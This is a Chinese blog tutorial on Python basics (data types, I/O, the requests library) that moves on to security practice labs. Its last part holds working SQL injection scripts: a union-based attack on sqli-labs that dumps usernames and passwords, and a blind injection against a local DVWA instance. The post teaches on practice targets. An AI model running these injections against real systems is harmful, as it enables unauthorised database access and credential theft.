python的基础语法与网安应用

最新推荐文章于 2024-10-18 00:00:00 发布
最新推荐文章于 2024-10-18 00:00:00 发布
阅读量74 收藏
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jdk12123/article/details/133097243
版权

环境的配置:

方便省事,直接用pycharm
在这里插入图片描述
浅浅尝试一下发现成功

python的数据类型:

Numbers(数字)
String(字符串)
List(列表)
Tuple(元组)
Dictionary(字典)

数字:

int型:

a=1.0
int(a)
a=1

大体上与c语言差不多
但是python是支持复数的
complex(x, y) 将 x 和 y 转换到一个复数,实数部分为 x,虚数部分为 y。x 和 y 是数字表达式。
在这里插入图片描述
PS:值得注意的是:python没有”;“

列表:

序列是 Python 中最基本的数据结构。

序列中的每个值都有对应的位置值,称之为索引,第一个索引是 0,第二个索引是 1,依此类推。
Python 有 6 个序列的内置类型,但最常见的是列表和元组。
列表都可以进行的操作包括索引,切片,加,乘,检查成员。
此外,Python 已经内置确定序列的长度以及确定最大和最小的元素的方法。
列表是最常用的 Python 数据类型,它可以作为一个方括号内的逗号分隔值出现。
列表的数据项不需要具有相同的类型
创建一个列表,只要把逗号分隔的不同的数据项使用方括号括起来即可。

list = []
list.append('546456') #添加
list.append('gvdgdg')
print(list)
del list[1]  #删除
print(list)

在这里插入图片描述

元组

Python的元组与列表类似,不同之处在于元组的元素不能修改,元组中只包含一个元素时,需要在元素
后面添加逗号,元组可以直接相加拼接,也可以直接使用del删除。

y1 = (1, 2, 3, 4, 5 )
y2 = ("f**k you",)
print(y1 + y2)

在这里插入图片描述

字典:

字典是另一种可变容器模型,且可存储任意类型对象。

字典的每个键值 key=>value 对用冒号 : 分割,每个对之间用逗号(,)分割,整个字典包括在花括号 {} 中

tinydict = {'Name': '张三', '年龄': 7, '班级': 'First'}
print("tinydict['Name']: ", tinydict['Name'])
print("tinydict['年龄']: ", tinydict['年龄'])

在这里插入图片描述

tinydict = {'Name': '张三', '年龄': 7, '班级': 'First'}
tinydict['Name'] = 8 # 更新
tinydict['ff'] = "ffffffffawdadawd" # 添加
print("tinydict['Name']: ", tinydict['Name'])
print("tinydict['ff']: ", tinydict['ff'])
del tinydict['Name'] # 删除键是'Name'的数值
tinydict.clear() #删除所有数值

输入与输出:

a = 100
b = 50
print(a+b)
print('Hello,world!')
print("Hello,world!")

name = input('请输入您的姓名:')
print('我的姓名是'+name)

python在web中的应用:

request:

函数 用法
requests.request() 构造一个请求,支撑以下各方法的基础方法
requests.get() 获取HTML网页的主要方法,对应于HTTP的GET
requests.head() 获取HTML网页头信息的方法,对应于HTTP的HEAD
requests.post() 向HTML网页提交POST 请求的方法,对应于HTTP的POST
requests.put() 向HTML网页提交PUT请求的方法,对应于HTTP的PUT
requests.patch() 向HTML网页提交局部修改请求,对应于HTTP的PATCH
requests.delete() 向HTML网页提交删除请求,对应于HTTP的DELETE

实例:get传参

import requests
kv = {'key1': 'value1', 'key2': 'value2'}
r = requests.get("http://python123.io/ws", params = kv)
print (r.url)

运行结果:
在这里插入图片描述
诶,是不是很像我们ctf做题时的payload

返回内容

import requests
req = requests.get("http://www.uploa.com/upload-labs/")
print(req.text)

测试之前的网站:
在这里插入图片描述
返回了网页的源码:
继续

import requests

req = requests.get("http://www.uploa.com/upload-labs/")
print(type(req))  # 查看响应对象的类型
print(req.cookies) # 查看cookie

在这里插入图片描述

实战:SQL注入:

import requests
url = "http://www.sql-lab.com/sqli-labs-master/Less-1/"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
;q=0.8'
}
str1 = 'Unknown column'
def func1():
for i in range(1,6):
url1 = url + '?id=1\' order by {} --+'.format(i)
r = requests.get(url1,headers=header)
#print(r.url)
if(str1 in r.text):
print('字段数为:' + format(i - 1))
break
def func2():
url2 = url + '?id=-1\' union select
1,group_concat(username,\':\',password),3 from users --+'
r = requests.get(url2,headers=header)
print(r.url)
print(r.text)
if __name__ == "__main__":
func1() #判断字段数
func2() #获取数据

在这里插入图片描述

DVWA 的盲注:

![在这里插入图片描述](https://img-blog.csdnimg.cn/e7ae6b9a9585447ea299ced53e09367e.png)
import requests

url = 'http://192.168.141.130/01/vulnerabilities/sqli_blind/'
cookie = {'id': '1', 'PHPSESSID': '7r8f2nlki2dhbdi29u6jg1j9ps', 'security': 'high'}
correct_len = len(requests.get(url=url, cookies=cookie).text)
# print(correct_len)
strs = 'qwertyuiopasdfghjklzxcvbnm'


def inject1():
    dbNameLen = 0
    while True:
        testcookie = '1\'+and+length(database())=' + str(dbNameLen) + '#'
        coo = {'id': testcookie, 'PHPSESSID': '7r8f2nlki2dhbdi29u6jg1j9ps', 'security': 'high'}
        if len(requests.get(url=url, cookies=coo).text) == correct_len:
            break
        dbNameLen += 1
    return dbNameLen


def inject2():
    dbName = ''
    for i in range(1, 5):
        for j in strs:
            testcookie = '1\' and (select ascii(substr(database(),{},1)) = {}) '.format(i, ord(j)) + '#'
            # print(testcookie)
            coo = {'id': testcookie, 'PHPSESSID': '7r8f2nlki2dhbdi29u6jg1j9ps', 'security': 'high'}
            if len(requests.get(url=url, cookies=coo).text) == correct_len:
                dbName += j
                # print(dbName)
                break
    return dbName


print(inject1())
print(inject2())

在这里插入图片描述
好奇怪 原来是没改cookie
在这里插入图片描述

import requests

url = 'http://192.168.141.130/01/vulnerabilities/sqli_blind/'
cookie = {
    'id': '1',
    'PHPSESSID': 'fobc2fpnamma2plklu3fm9ahs1',
    'security': 'high'
}

# 获取正确的页面长度
correct_len = len(requests.get(url=url, cookies=cookie).text)

# 字符串集合
strs = 'qwertyuiopasdfghjklzxcvbnm'

def inject1():
    dbNameLen = 0
    while True:
        payload = f"1' AND LENGTH(DATABASE())={dbNameLen}-- "
        testcookie = {
            'id': payload,
            'PHPSESSID': 'fobc2fpnamma2plklu3fm9ahs1',
            'security': 'high'
        }
        if len(requests.get(url=url, cookies=testcookie).text) == correct_len:
            break
        dbNameLen += 1
    return dbNameLen

def inject2():
    dbName = ''
    for i in range(1, 5):
        for j in strs:
            payload = f"1' AND (SELECT ASCII(SUBSTRING(DATABASE(), {i}, 1))={ord(j)})-- "
            testcookie = {
                'id': payload,
                'PHPSESSID': 'fobc2fpnamma2plklu3fm9ahs1',
                'security': 'high'
            }
            if len(requests.get(url=url, cookies=testcookie).text) == correct_len:
                dbName += j
                break
    return dbName

print(inject1())
print(inject2())
NetDefend
关注
python 语法 网络编程
愿自己天天开心
09-06 869
介绍如何建立服务器端以及客户端互通收发数据
python网络编程基础语法_python网络编程
weixin_35776153的博客
01-13 124
知识内容:1.socket语法及相关2.黏包3.struct模块4.subprocess模块5.socketserver模块6.验证客户端连接的合法性参考:一、socket语法及相关1.基于TCP协议的socketTCP是基于连接的,必须先启动服务端,然后再启动客户端去链接服务端;另外双方一定要有一方发消息一方收消息,不能同时收消息或同时发消息TCP编程中用到的socket模块中的方法如下:soc...
python网络编程
慕林溪的博客
12-21 442
网络通信是计算机之间的进程之间的通信。 Socket又称"套接字"是网络编程的一个抽象概念。应用程序通常通过"套接字"向网络发出请求或者应答网络请求,使主机间或者一台计算机上的进程间可以通讯。 TCP编程: 客户端:创建TCP连接时,主动发起连接的叫客户端,被动响应连接的叫服务器。
Python基础语法16 网络编程
qq_45183681的博客
07-03 242
TCP编程-访问别的服务器 导入socket import socket ‘’’ #创建socket对象 参数一:指定的ip协议 ipv4协议 参数二:指定的tcp协议 ‘’’ sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) ‘’’ #创建连接 address地址,以元组的形式传递 域名/ip地址 端口号 网页的端口 80 STM...
python基础之输入输出语法
jiankang66的博客
04-22 9792
博主简介:原互联网大厂tencent员工,网安巨头Venustech员工,阿里云开发社区专家博主,微信公众号java基础笔记优质创作者,csdn优质创作博主,创业者,知识共享者,欢迎关注,点赞,收藏。 目录一、背景二、输入和输出1、输出2、输入四、参考五、总结 一、背景   Python 是一门易于学习、功能强大的编程语言。它提供了高效的高级数据结构,还能简单有效地面向对象编程。Python 优雅的语法和动态类型以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的理想语言。下面我们来介绍一下.
网安基础之python学习第一天
qq_52074678的博客
06-29 630
如何学习python直到编写自己的工具
python基础之应用场景
jiankang66的博客
04-14 4425
博主简介:原互联网大厂tencent员工,网安巨头Venustech员工,阿里云开发社区专家博主,微信公众号java基础笔记优质创作者,csdn优质创作博主,创业者,知识共享者,欢迎关注,点赞,收藏。 目录一、前言二、应用场景1.Web应用开发2.图形界面开发3、类库丰富4、可扩展5、解释性6、可移植性三、缺点1、运行速度慢2、代码不能加密四、参考五、总结 一、前言   Python 是一门易于学习、功能强大的编程语言。它提供了高效的高级数据结构,还能简单有效地面向对象编程。Python 优雅的语法和.
python基础之写文件操作
jiankang66的博客
07-25 1万+
写文件操作系列
python基础之循环语句
jiankang66的博客
04-27 3085
博主简介:原互联网大厂tencent员工,网安巨头Venustech员工,阿里云开发社区专家博主,微信公众号java基础笔记优质创作者,csdn优质创作博主,创业者,知识共享者,欢迎关注,点赞,收藏。 目录一、背景二、实操1、for循环语句2、while循环语句3、循环嵌套四、参考五、总结 一、背景   Python 是一门易于学习、功能强大的编程语言。它提供了高效的高级数据结构,还能简单有效地面向对象编程。Python 优雅的语法和动态类型以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用.
python基础之语言发展历史
jiankang66的博客
04-14 3030
博主简介:原互联网大厂tencent员工,网安巨头Venustech员工,阿里云开发社区专家博主,微信公众号java基础笔记优质创作者,csdn优质创作博主,创业者,知识共享者,欢迎关注,点赞,收藏。 目录一、前言二、发展历史1、Python是一种面向对象的解释型编程语言2、Python常被称为胶水语言3、Python由Guido开发4、Python连续多年入选编程语言TOP105、Python的发展历史三、总结 一、前言   由于Python语言的简洁性、易读性以及可扩展性,它在网络爬虫、数据分析、.
2023-2024-2本科《面向对象程序设计》22网安本科1-2班-实训指导书-李延超.doc
06-17
- **基础知识巩固**:通过具体项目加深学生对Python语言基础语法的理解。 - **设计理念实践**:强化学生对于面向对象程序设计的核心理念(如封装、继承、多态等)的实际应用能力。 - **编程技能提升**:提高学生的...
2024年网安最全100 个基本的 Python 面试问题第一部分(1-20)_gurobi面试
2301_79985178的博客
05-01 83
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。顺便说一下,仅检索超过 no 的起始索引处的切片。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;因此, list1 和 list3 在同一个默认列表上运行,而 list2 在它自己创建的单独对象上运行(通过传递一个空列表作为 list 参数的值)。
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
热门推荐
杨秀璋的专栏
09-29 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源和用户名密码,本文将讲解Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。
为什么要学网络安全?如何学习网络安全?这3个理由告诉你(自己整理的50G网安资料)
weixin_72912381的博客
12-08 1793
相信很多小伙伴最近都听说网络安全它很火,那么网络安全它难吗?其实并不难,网络安全入门更简单!可不要被它神秘的外衣给唬住了。只要你接下来认真听完我的讲解,虽然保证不了你能成为大神,但就算你学习能力再差那也能达到入门级别。
pandas中数据子集的获取
weixin_43597208的博客
10-14 469
通常,在pandas模块中实现数据框子集的获取可以使用iloc、loc和ix三种方法,这三种方法既可以对数据行进行筛选,也可以实现变量的筛选,它们的语法可以表示成[rows_select,cols_select]。iloc只能通过行号和列号进行数据的筛选,可以将iloc中的i理解为’integer’,即只能向[rows_select,cols_select]指定整数列表该索引方式与数组的索引方式类似,都是从0开始,可以间隔取号,对于切片仍然无法取到上限。
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
最新发布
全网粉丝100W+、全栈领域优质创作者、B站、github、CSDN等社区技术专家、专注于高端精品毕业项目源码实战
10-18 445
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
Python 使用 Jarvis 算法或包装的凸包(Convex Hull using Jarvis’ Algorithm or Wrapping)
csdn_aspnet的专栏
10-14 1206
例如,当输入 (0, 3), (0, 0), (0, 1), (3, 0), (3, 3) 时,它产生 (0, 3) (0, 0) (3, 0) (3, 3) 的输出;当输入 (0, 3), (0, 1), (0, 0), (3, 0), (3, 3) 时,输出为 (0, 3) (0, 1) (0, 0) (3, 0) (3, 3)。下一个点被选为在逆时针方向上领先于所有其他点的点,即,如果对于任何其他点 r,我们有“orientation(p, q, r) = 逆时针”,则下一个点是 q。
python入门到精通专题】8.装饰器
情不知所起一往而深
10-13 784
什么是property属性?一种用起来像是使用的实例属性一样的特殊属性,可以对应于某个方法。class Foo:pass# 定义property属性@propertypassfoo_obj.func() # 调用实例方法foo_obj.prop # 调用property属性@propertyreturn 100定义时,在实例方法的基础上添加 @property 装饰器;并且仅有一个self参数调用时,无需括号。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值